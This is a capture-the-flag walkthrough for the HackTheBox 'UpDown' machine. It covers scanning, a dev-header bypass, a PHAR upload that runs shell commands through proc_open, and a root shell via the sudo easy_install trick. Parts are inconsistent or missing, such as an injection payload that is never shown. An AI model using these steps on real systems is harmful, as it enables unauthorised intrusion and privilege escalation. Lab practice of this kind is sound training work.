Up Down
Up Down
Up Down
IP:10.129.111.50
THM{THREAT_BLOCKED}
Enumeration
nmap -vv --min-rate=1000 -T4 10.129.111.50 | grep '^[0-9]'|cut -d '/' -f 1|tr '\n' ','|sed s/,$//
nmap -vv -p22,80 -T4 -sCV -o nmap.txt 10.129.111.50
First find the git repo on the webapp and the vhost.
dirsearch -u http://siteisup.htb/
┌──(loc㉿kali)-[~/HackTheBox/UpDown]
└─$ dirsearch -u http://siteisup.htb/
#########################
[06:26:02] 301 - 310B - /dev -> http://siteisup.htb/dev/
########################
On the source code of git repo, check the checker.php file, you will see that you are able to upload files and .phar is not included in the upload filter.
Also from .htaccess, you will see that you need a header like this to access the dev.siteisup.htb (You can use burp and just create a rule):
code Special-Dev: only4dev
Using this you are able to run some commands, but there are some disabled functions that prevents us from running system commands.
You can use file_put_contents to put <?php phpinfo(); ?> to a php file on wepapp and see what those functions are.
proc_open function is not one of those disabled functions so after the urls put this by modifying the ip and port and upload the phar file:
code <?php
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("file", "/tmp/error-output.txt", "a") // stderr is a file to write to
);
$process = proc_open("sh", $descriptorspec, $pipes);
if (is_resource($process)) {
// $pipes now looks like this:
// 0 => writeable handle connected to child stdin
// 1 => readable handle connected to child stdout
// Any error output will be appended to /tmp/error-output.txt
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
// It is important that you close any pipes before calling
// proc_close in order to avoid a deadlock
$return_value = proc_close($process);
echo "command returned $return_value\n";
}
?>
Foothold
And then you can just make a get request to the phar file with a command like this without to much bother:
code curl -H 'Special-Dev: only4dev' -s http://dev.siteisup.htb/uploads/ | grep "\[DIR\]" | cut -d "\"" -f 8 >
folder-names; while read -r line; do curl -v -H 'Special-Dev: only4dev' "http://dev.siteisup.htb/uploads/
${line}<PHAR-FILE-NAME>.phar"; done < folder-names
USER
Running strings or just running it, it is clear that it just runs the python script with suid privileges.
We can inject commands and get the user's ssh key by simply inputting something like:
After logging in with the ssh key you got, checking sudo you will see this:
You can get root by running these commands from easy_install | GTFOBins
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo easy_install $TF
Endgame 04/09/2022